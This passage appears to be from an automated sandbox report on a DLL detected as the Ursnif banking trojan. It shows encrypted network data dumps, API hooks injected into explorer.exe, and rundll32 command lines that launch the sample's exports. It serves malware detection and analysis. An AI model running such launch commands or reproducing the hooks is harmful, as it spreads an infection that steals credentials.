                                                          2021-10-08 04:46:14 UTC512INData Raw: f1 d4 9c 97 55 af 90 29 bf 8c e4 69 c1 ab fa cb 06 10 d5 ec 65 1a a7 0c 19 b7 40 1d d1 bc 6f b0 66 ff 30 1f 25 92 a6 64 35 98 a1 26 af fc 75 67 99 70 a1 60 51 cd 1b 54 2b 6d 6a c8 83 2d 89 d5 53 98 20 7a 25 e6 83 9c 2a 3c 7d 8a 64 89 1b 65 da 37 58 4c dd 44 6a e3 16 a4 cc 55 64 8e 44 aa 77 c2 83 20 40 2c ab e7 0e c8 98 ba 9d 6b db 1e c9 01 8b 7b d0 52 ca a2 1a 0d 17 12 34 6f 17 a8 eb ed 86 5a d2 08 a1 19 29 03 07 41 8b c7 0f dd bd 27 58 47 83 22 37 36 2b 76 53 2f 99 6a ff 4d e8 31 0d 63 af 07 2b ed 46 cf 2c db 31 6a 93 01 aa 4b 64 5d 55 86 5f 6f fb b3 32 9a 04 02 e7 86 5e 77 2d 07 4d fc e3 e5 7e da 69 f8 b1 32 54 53 a3 18 7a 48 69 ed 81 33 a8 79 12 7a 09 12 78 e5 76 10 cc 53 e4 a9 c3 24 7f a6 96 81 b9 79 35 41 38 37 2f f0 e0 b8 bf a5 2d 57 da 67 5c 0b 0a
                                                          Data Ascii: U)ie@of0%d5&ugp`QT+mj-S z%*<}de7XLDjUdDw @,k{R4oZ)A'XG"76+vS/jM1c+F,1jKd]U_o2^w-M~i2TSzHi3yzxvS$y5A87/-Wg\
                                                          2021-10-08 04:46:15 UTC528INData Raw: 14 3a 58 80 b0 f3 f1 85 ac fc 89 28 3c a1 12 4c da 29 0c fa 3e 6d ca 3a 56 69 fd 46 23 f8 5a c7 3a 95 c4 1b 98 74 1a 52 64 e2 3a af 22 f4 54 11 2f 8a 95 98 62 19 52 8b bc bc 2f 9e 6c d8 73 6e 0b 59 17 b5 52 25 14 bb cb ca 95 71 9b 03 e9 df f6 f4 6a 58 57 8f f9 67 89 73 8e 61 c5 2b 7f ab ad c1 6e 29 d7 cd 6a 97 7e 99 f5 2b 5e 78 76 be 07 23 ad 56 41 88 6e 78 cb 39 f6 f1 67 1c c8 c4 1d ed d8 3e 90 89 d6 b5 32 ac d6 c1 9e fc 9b 24 67 12 e4 52 58 fe 61 1a e6 97 da 2e 97 19 31 e7 77 3e e2 e4 84 b3 74 0f d8 da 13 8d 58 a1 7b ad d4 d0 f7 cb d5 b5 66 df 61 c5 73 b3 f8 6b 52 de f9 29 43 cc e9 a3 fe e5 d0 b4 1b 59 b8 f9 ff 64 72 ea 30 b6 54 34 fd b7 3b 41 ea 93 0a 6c 20 5d fc a3 a4 8e 7a ed 49 9f 35 53 6c 32 78 60 d3 eb 51 c9 e3 24 b1 d9 84 72 75 53 49 1f f6 a5 df
                                                          Data Ascii: :X(<L)>m:ViF#Z:tRd:"T/bR/lsnYR%qjXWgsa+n)j~+^xv#VAnx9g>2$gRXa.1w>tX{faskR)CYdr0T4;Al ]zI5Sl2x`Q$ruSI
                                                          2021-10-08 04:46:15 UTC544INData Raw: c5 4d 3e e5 79 2a 49 f1 21 29 bc f5 ca 6c 1b 6e 17 d0 15 87 41 f6 e3 b2 3a c7 3a 77 9e 19 d7 2b 4b 4e dd bd 50 19 44 f3 b6 27 44 02 38 61 ca 43 9c ad ef 98 47 21 d0 af a5 4a 43 20 ef fe 99 4e 92 32 d4 df 07 cc 27 84 ec 71 fd 0f 80 e1 6a 65 0f 7a cd aa c7 12 57 71 f3 45 7f a1 47 5a fc 04 aa 9f 99 77 ec 2b 1a c7 d3 89 fc 63 11 07 e2 04 0f 4d fb f1 7e 9e 64 fa 3c fd d8 1c 4e d3 e4 ad f8 a8 4e 4c 19 a9 5e 8b ae f8 76 ff 0c 0e ec dc c5 14 23 6b f9 c1 26 14 3a 36 f5 c2 9e 2d aa e9 9c 35 29 f0 04 cc e4 a4 86 4c 80 89 47 88 b0 77 62 9d 98 9a b9 ee b0 2f 22 f1 23 9e e2 fe 27 e1 f1 24 2c 87 76 9b 8a 93 70 cc 1f 2d a6 4e 79 fa 03 cc f2 b3 fa 2e 6a 27 c5 44 15 0d 39 63 40 a4 9e b5 65 37 b4 54 c8 a0 64 93 82 db 91 5f 6c e5 ce 0a b5 06 3f 12 64 c6 f4 78 ef 87 7d 6f d1
                                                          Data Ascii: M>y*I!)lnA::w+KNPD'D8aCG!JC N2'qjezWqEGZw+cM~d<NNL^v#k&:6-5)LGwb/"#'$,vp-Ny.j'D9c@e7Td_l?dx}o
                                                          2021-10-08 04:46:15 UTC560INData Raw: fc 13 c6 c7 bb 87 62 3d 39 6a 86 ad a2 35 99 35 9a bf 78 f4 aa 74 d6 a9 52 0e b5 c2 e7 c6 22 99 23 c1 e6 fb b7 38 55 6c da 7c a3 27 14 75 63 00 9d e2 ec 4b ab cd 20 53 07 ee 46 1b 6a 0f b7 20 46 d2 ec 56 db 3c 50 5e 6e 05 e7 19 f7 1b 09 c4 fa 9e 2d 53 9e 55 b8 73 12 85 33 37 e1 9a d5 63 da 31 65 7f d7 21 38 cc 3a 1e a7 88 41 03 89 3a 7d b0 4b aa 65 23 42 67 fc 0e d3 57 4d e7 b0 1f 07 19 8e 93 c2 d9 48 3d 71 fd 42 ad 71 be f7 2d b0 83 23 83 be 0c 8d a2 c1 c0 8d 19 15 1e 87 41 bc 89 eb 47 61 34 98 58 61 00 af 5a 43 95 8a 4f 3e 27 f8 ee 12 2e 60 93 d2 d4 25 4a c6 cd b6 2c d1 b4 fd 13 89 da e1 16 d9 23 b1 2e dc 25 26 97 99 ce b7 99 ca dc 11 ec ac 46 6e 30 46 b9 d9 65 85 07 79 c2 b3 53 68 8d 6d 50 c9 98 b5 65 d4 29 bb b1 e7 96 e5 bb 7e d3 e4 87 2c 1a ff c7 d9
                                                          Data Ascii: b=9j55xtR"#8Ul|'ucK SFj FV<P^n-SUs37c1e!8:A:}Ke#BgWMH=qBq-#AGa4XaZCO>'.`%J,#.%&Fn0FeyShmPe)~,
                                                          2021-10-08 04:46:15 UTC576INData Raw: d5 99 ba 9a e1 5a 81 5a 6e 5d 3c 24 b2 ca c7 57 6d 0c c5 b2 07 3d 9c a9 6f fc 32 27 c5 33 b4 88 06 4f 2e 37 4d e9 d4 a0 95 b8 df dc 9a c0 75 a1 0a b5 ac d6 4b 05 94 8e 54 b2 82 7d 5a 49 4e 1b 2e 6c 31 7f 43 72 d2 e4 2d 66 be a2 dc ac 23 94 3b 7f 0b c0 7f 90 da 3b 1b fc 5d 71 a1 b8 44 82 4b c3 ff 74 fa 84 29 57 1f df 5f 56 65 cd 8f f4 3d 8d b3 fa 62 e9 2d f2 dc 10 e7 47 54 30 3d 18 75 e2 25 94 a0 af 41 a4 d2 12 ea 6c f3 12 33 12 9e 62 58 39 19 0a 45 0d 6f 7f 5e 58 38 7d 93 bd 5f 1a d2 33 58 b2 1d 55 d1 d7 55 13 14 89 ff 7e d7 c0 a7 b4 69 bf 50 0b d6 7d ad 21 97 ff 36 25 8f f2 bd 0c a3 3f 7f 12 65 3d 0d 46 ae 1a fd ff 89 ed 06 be a8 45 c9 16 51 4f 7e 3b 08 5f 8b 65 03 34 90 5b 91 ac 97 a4 7b 87 87 7c af 85 c5 65 5f cb 49 9b 86 cc 18 33 a6 3d 59 23 ac 30 68
                                                          Data Ascii: ZZn]<$Wm=o2'3O.7MuKT}ZIN.l1Cr-f#;;]qDKt)W_Ve=b-GT0=u%Al3bX9Eo^X8}_3XUU~iP}!6%?e=FEQO~;_e4[{|e_I3=Y#0h
                                                          2021-10-08 04:46:15 UTC592INData Raw: 17 22 e8 fd bf 96 c2 79 44 f9 1f 50 23 f8 33 be 7f 7b df 10 9b 5e 9a 76 c7 0a 4c 83 be ec 3c ed 9e eb e0 58 b1 7a 5e 32 12 a4 e2 ad 7e 98 8d f3 70 62 e9 6d b5 20 ce a6 d2 d1 52 c7 e2 95 0a 97 02 50 5b 3e c5 62 84 05 a8 3f 20 ff b5 f3 ef 24 40 0c 6d 9e 44 af 31 97 8b b2 e5 37 c3 51 65 ee 8b 3c 98 3e b0 25 79 26 6c 21 19 b9 1c 95 65 33 17 58 b2 f0 57 50 2d aa 92 16 5d 35 30 43 ac 04 1a a2 e8 9b 3e 08 df 29 f1 75 f9 96 f0 17 3b 4b 88 0f 33 87 f0 71 4e b1 d4 43 58 cf 25 5e d1 7b 81 64 0b 08 df 3a 91 16 da ba 35 ed 45 f9 8e 09 63 eb b1 08 9e 62 20 33 97 d3 cc fb 58 a6 58 c5 52 68 c5 c7 c7 1a bc 77 db 0b 7f 25 26 92 5e 0a fb 02 94 b1 e3 bd 03 85 d9 df 07 32 29 a3 da 9c 12 1e 10 0b c1 65 c4 25 24 86 ff 8b 7b 0c c9 48 f8 c2 e0 b3 63 72 ea 47 7b 88 59 68 10 ff a4
                                                          Data Ascii: "yDP#3{^vL<Xz^2~pbm RP[>b? $@mD17Qe<>%y&l!e3XWP-]50C>)u;K3qNCX%^{d:5Ecb 3XXRhw%&^2)e%${HcrG{Yh
                                                          2021-10-08 04:46:15 UTC608INData Raw: 36 1e 66 36 e9 ab 62 53 c6 24 e8 cf 14 7d de 3a fc 16 27 d6 4e 15 b5 49 b6 8e f8 ac 23 51 1e 9f f4 38 0b 0a 9d 4d 0a 49 d7 25 29 2b 6f 52 97 ff 99 ac 29 76 72 d5 00 86 62 3f fc 0f 1d 9d 8b 1e 11 67 0d 8e 2f 13 a5 06 c9 6f 51 4b ca ab 20 46 48 e8 69 68 59 1d 34 f2 2e 4e 19 af de c1 8c 99 4a 58 6e bc 27 86 08 5c 26 a9 c5 16 59 ab dc 1e 01 ea f1 cf b8 46 a6 4b a6 70 fb c5 f3 03 0c 88 cb 75 fc ed 70 4e 7a de d8 79 44 c2 1f 42 35 53 ae 6a cd 98 74 82 a0 9b e9 d1 94 ec 28 5e cd 81 ac 3d a6 f9 72 0b 3c 9d 14 c3 93 8f 73 fd b1 35 34 65 9e 7f e1 4c dd 03 71 67 1e 40 9a ae 47 fa 54 c3 45 56 4a 64 c9 a4 34 4c 53 e4 c3 35 ae 23 e4 4c 98 58 09 c6 71 a7 22 8d 55 15 e4 88 ab f3 7f 9e b2 12 e3 b9 3c 04 6a 8c ad 89 4d 87 d0 a6 2f 1e c9 db be c2 d6 3d 76 43 6c 53 34 2a 5b
                                                          Data Ascii: 6f6bS$}:'NI#Q8MI%)+oR)vrb?g/oQK FHihY4.NJXn'\&YFKpupNzyDB5Sjt(^=r<s54eLqg@GTEVJd4LS5#LXq"U<jM/=vClS4*[
                                                          2021-10-08 04:46:15 UTC624INData Raw: a9 12 1c d4 6d b4 8a cd a0 43 40 81 23 c3 00 96 7f 96 0b ca b5 d0 90 0b 95 0f 87 a6 01 6d 95 aa 34 88 ee 7a e3 5f 9f 2a 3a e3 97 c9 1f da 68 ab ea 30 70 d8 c2 8c 3e df 77 9d 5a b9 89 e8 75 21 26 a8 58 98 b2 cb 60 0c 02 dc 8f 06 a6 6d cb 5b 2c df de d4 7c 99 16 e4 a8 b3 3d 4b 6b 85 a1 79 c7 e0 53 2e 2d 36 b2 7f 56 1b 33 85 5a e3 c4 08 c7 2f fd 21 58 dc 54 00 e6 db c2 17 be 88 c1 1a db da 96 49 1d 23 e3 20 94 8b 0a 77 a9 8c aa bf 61 f0 67 56 bf 1b 5c 31 25 72 8f c2 1d 59 e5 48 30 a1 8e b8 d4 73 67 65 33 f2 a5 b6 15 7a 47 ed 5d f2 78 26 07 9c d1 8a f4 fb e2 6b f1 a9 1a 21 3d 23 d7 02 20 dd c0 fb 41 14 aa 66 b1 d5 b0 45 c1 3c 5c 17 35 63 60 dc c1 dc 25 b8 b5 8a fb 05 27 52 f9 ec 1e 22 7b e6 ec 32 de e7 58 d2 31 c5 13 61 5a c3 ea ee af 7e 00 fd 67 34 03 22 68
                                                          Data Ascii: mC@#m4z_*:h0p>wZu!&X`m[,|=KkyS.-6V3Z/!XTI# wagV\1%rYH0sge3zG]x&k!=# AfE<\5c`%'R"{2X1aZ~g4"h
                                                          2021-10-08 04:46:15 UTC640INData Raw: 02 5f 02 fe 23 fd 84 cf 58 65 bf 0f 62 e6 87 5c 2d cd e0 bc 62 71 af 8e 50 c9 f9 27 ee 56 ac 5e d9 ef 29 65 92 52 50 54 ae 31 0c b3 87 2d 56 ad a4 ba 2b fd 8c e1 ec 2c 71 e7 93 44 bc 7f 37 19 79 1b aa 3a 39 ae ba 2d ce a1 b7 d7 40 e1 64 e8 99 76 54 ea 94 50 a9 05 76 e0 db 0f 6d ac 49 8c e3 b0 75 7a 4e 2f eb 95 be e7 07 aa ab 31 7b e0 d8 e3 3c df 38 81 94 11 eb cc 79 9a 43 f2 3e 2c 0c 5b 14 e5 f1 75 d3 05 de 4e a6 a0 54 6b 99 00 22 2b 9b 55 7b 75 c0 7a c6 45 9b 15 33 41 e0 16 b6 cc fc 71 75 07 67 6c 20 ca b2 61 28 7d 58 cc 58 10 0c 50 c3 b5 17 aa d7 40 ec 21 fe 0b 5c 52 de b9 73 c0 1c 4f 2b 99 f1 d6 22 2e 5a 29 e0 08 b4 bb 7d 27 3b 97 ee 15 51 92 34 2e 7c 61 62 75 b9 a2 d4 d8 f1 96 6d 8a c9 8d 22 2e c9 2f 8d 8e fa b7 04 8f 81 f6 42 45 ce 9f 06 1e a2 c4 ca
                                                          Data Ascii: _#Xeb\-bqP'V^)eRPT1-V+,qD7y:9-@dvTPvmIuzN/1{<8yC>,[uNTk"+U{uzE3Aqugl a(}XXP@!\RsO+".Z)}';Q4.|abum"./BE
                                                          2021-10-08 04:46:15 UTC656INData Raw: 17 76 76 00 8e 69 e7 50 e7 2a aa 8b 13 8d 95 a3 bc 99 e7 2e bb 2d 9d d5 59 97 81 31 a3 ab 1b a8 b4 04 f4 9a d7 df 21 73 99 c5 a1 89 df 8f 0b 47 67 31 06 f5 b9 c4 18 57 5e 75 07 ab bb da 95 73 92 99 f6 f0 2f bd 9f c9 58 76 f4 1f d7 af c6 c6 e2 a4 7e e6 bf 32 96 a7 19 7f 94 76 3b ef 5d 01 59 c6 a4 6a ce d6 87 dc a8 65 19 ae 7c a1 34 bf ab 60 e3 dc 57 bd 34 21 d5 ed 6e 39 19 9d 0c e7 0f b1 5d 32 61 2b 3d 54 04 a8 d0 33 68 eb 34 4e 8a 91 22 f5 ce 28 4c be fc 1d a3 7e 54 cd 94 7d fe 9c 61 36 f6 59 8b d8 1f ef 19 a5 27 72 1f 65 89 a5 58 7e 10 47 2d 2b 82 4b 0f ff b0 1c 7e 28 b6 2d de 32 08 f9 39 c7 5d 3b f0 18 a8 ca d4 ef aa f9 6d cb e8 9b 94 d9 9f a2 5a f1 fd 8c ed 3b 72 01 33 3f b1 d9 90 be 32 0e 9b 0b 12 55 46 e4 d3 b6 d6 5f 0d 24 88 8c 14 3b 02 fe 44 e9 b8
                                                          Data Ascii: vviP*.-Y1!sGg1W^us/Xv~2v;]Yje|4`W4!n9]2a+=T3h4N"(L~T}a6Y'reX~G-+K~(-29];mZ;r3?2UF_$;D
                                                          2021-10-08 04:46:15 UTC672INData Raw: b2 75 c2 d9 30 e3 9c a9 d2 44 ce a8 c3 51 b7 4f 11 e2 fe d9 e3 85 36 ea d2 35 54 58 04 5b f2 87 6e 9b 60 78 c0 bd bd 43 75 d4 c0 9f 9e cc 1e e5 28 10 c3 a3 c7 74 20 28 47 3c 59 6d 62 e2 5a 9b c0 c9 88 ac 31 bb 82 01 23 d8 f5 8c c0 55 a2 cc 56 cc 2b 88 6d 1d a2 85 76 de 24 4b 06 c4 00 c5 f6 d2 f9 3c 03 8e 7a d7 fc c7 e1 82 0f b6 32 9a e1 08 02 8d 7c 0b 26 da 60 b9 b2 fc df db 60 a9 a5 ed 9c b7 16 cc 43 95 e7 60 59 53 21 09 0b 50 41 31 9e fa cf 17 ff 31 0c 55 30 e4 b1 ac a4 16 68 a1 17 da e3 65 54 89 ec 18 8f 34 21 84 01 bf f4 67 42 fc 3b 3b 91 22 de c3 c4 b3 87 48 be 4f 28 de 3a 9e f0 af bc dc 8d 71 7f bd 77 25 4e 7f b3 82 e0 70 4b d1 36 2f b0 d9 4a c1 60 38 f5 6d 25 a0 d6 94 aa e9 2b 7c d2 0f e1 16 d6 bd 3c 70 e2 18 b1 68 ac c4 49 68 c6 7e ba f8 df 6c 10
                                                          Data Ascii: u0DQO65TX[n`xCu(t (G<YmbZ1#UV+mv$K<z2|&``C`YS!PA11U0heT4!gB;;"HO(:qw%NpK6/J`8m%+|<phIh~l
                                                          2021-10-08 04:46:15 UTC688INData Raw: 03 f1 9b 10 f9 29 8a 21 a9 a1 75 75 26 bc 31 a8 bb 40 7a 68 50 e3 3e 48 98 94 f7 3c 63 84 f4 57 ce 30 80 be d8 c0 66 7a 9f fb 05 9b 9c 39 58 15 95 67 db ba e8 30 57 5b ca 96 8a 57 66 8a ce 65 8a 92 98 86 f5 2f 4e ba 5f 83 72 1c c4 32 79 6d 36 fb 48 63 17 45 e5 93 42 d7 c5 1e c6 b1 5b 96 4c b5 71 59 2a ba 97 db 47 8b e3 4b b0 ac f9 fa 8b 2f d5 28 58 9d 68 fd 17 42 3b b2 31 ee eb 37 96 16 59 a7 ac 8e 85 28 3e 5c 7e 38 b3 8d 68 e2 39 48 ba b4 33 f1 57 28 81 14 9b 63 42 f2 5f 9c f5 0b 04 0e fe 35 92 9c df 8e be 6a f2 b8 31 6f a7 c9 3c 36 9b 78 c3 00 f9 b1 14 42 98 ac 43 6f 33 0a 49 4e be dc 14 c2 f2 90 c2 f6 2c bd df 3c 60 6d 83 f6 f4 48 b7 de 18 db 77 da 76 48 3c 8c 59 6e 09 56 ff a6 6d 8c 3e 10 71 40 33 2e af 21 e5 21 55 27 c1 c7 29 47 26 0f 56 bc 14 01 04
                                                          Data Ascii: )!uu&1@zhP>H<cW0fz9Xg0W[Wfe/N_r2ym6HcEB[LqY*GK/(XhB;17Y(>\~8h9H3W(cB_5j1o<6xBCo3IN,<`mHwvH<YnVm>q@3.!!U')G&V
                                                          2021-10-08 04:46:15 UTC704INData Raw: 68 fc a2 2c 62 69 17 7e 64 30 53 66 82 12 65 25 31 80 13 2b 5e ed 93 06 79 a1 a8 4f c7 53 f6 97 fc 5f ed 47 e6 90 a0 1c b1 63 b0 2e e7 f3 dd 5b af 67 3b 85 db 3b d9 62 eb ad cb dc 8d 79 ab 80 67 75 0a d0 6d 60 db db ec 93 a1 0c 52 f3 95 1e 80 f1 06 9f 67 8f d0 16 41 52 3c bd 08 1c e5 fc 2f d4 d6 bd f1 70 18 8e 94 9b ac 2d 44 3f a9 e3 b6 8f c5 26 ad 49 d4 92 31 91 b8 f1 a4 31 10 e9 13 f5 b0 8d fc de e1 4d 57 0b 40 46 5a 23 00 ed 5d 80 54 3a 4b 4e c7 9c 21 c9 cc 4a 32 7d ad 60 76 16 0b 72 bc 62 27 e5 15 a4 fd 3e 58 57 11 0d fd 9f a7 fa a4 d6 de d6 f5 7b 21 54 df 08 ff b9 f5 9a 4e ec 3b 54 16 f0 7d 22 05 e0 b2 d1 a6 91 8d 59 4f 94 09 95 4e b5 02 91 e0 57 80 6c 74 8f 2a 5d 43 64 e6 44 d0 58 72 37 e6 54 f2 43 e9 5b 84 3b 01 16 df 5e f1 f0 b5 62 8d 94 7d 87 0b
                                                          Data Ascii: h,bi~d0Sfe%1+^yOS_Gc.[g;;bygum`RgAR</p-D?&I11MW@FZ#]T:KN!J2}`vrb'>XW{!TN;T}"YONWlt*]CdDXr7TC[;^b}


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function NameHook TypeActive in Processes
                                                          CreateProcessAsUserWEATexplorer.exe
                                                          CreateProcessAsUserWINLINEexplorer.exe
                                                          CreateProcessWEATexplorer.exe
                                                          CreateProcessWINLINEexplorer.exe
                                                          CreateProcessAEATexplorer.exe
                                                          CreateProcessAINLINEexplorer.exe
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: KERNEL32.DLL
                                                          Function NameHook TypeNew Data
                                                          CreateProcessAsUserWEAT7FFC8BAF521C
                                                          CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessWEAT7FFC8BAF5200
                                                          CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessAEAT7FFC8BAF520E
                                                          CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          Process: explorer.exe, Module: WININET.dll
                                                          Function NameHook TypeNew Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFC8BAF5200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6640E2C
                                                          Process: explorer.exe, Module: user32.dll
                                                          Function NameHook TypeNew Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFC8BAF5200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT6640E2C

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: loaddll32.exe PID: 6424 Parent PID: 1140

                                                          General

                                                          Start time:06:43:32
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\loaddll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                                                          Imagebase:0xdd0000
                                                          File size:893440 bytes
                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:moderate

                                                          Analysis Process: cmd.exe PID: 6392 Parent PID: 6424

                                                          General

                                                          Start time:06:43:33
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                                                          Imagebase:0xd80000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Analysis Process: rundll32.exe PID: 6400 Parent PID: 6424

                                                          General

                                                          Start time:06:43:33
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
                                                          Imagebase:0xab0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Analysis Process: rundll32.exe PID: 6388 Parent PID: 6392

                                                          General

                                                          Start time:06:43:33
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                                                          Imagebase:0xab0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Analysis Process: rundll32.exe PID: 5980 Parent PID: 6424

                                                          General

                                                          Start time:06:43:37
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget
                                                          Imagebase:0xab0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Analysis Process: rundll32.exe PID: 5868 Parent PID: 6424

                                                          General

                                                          Start time:06:43:43
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance
                                                          Imagebase:0xab0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Analysis Process: mshta.exe PID: 6856 Parent PID: 3352

                                                          General

                                                          Start time:06:46:14
                                                          Start date:08/10/2021
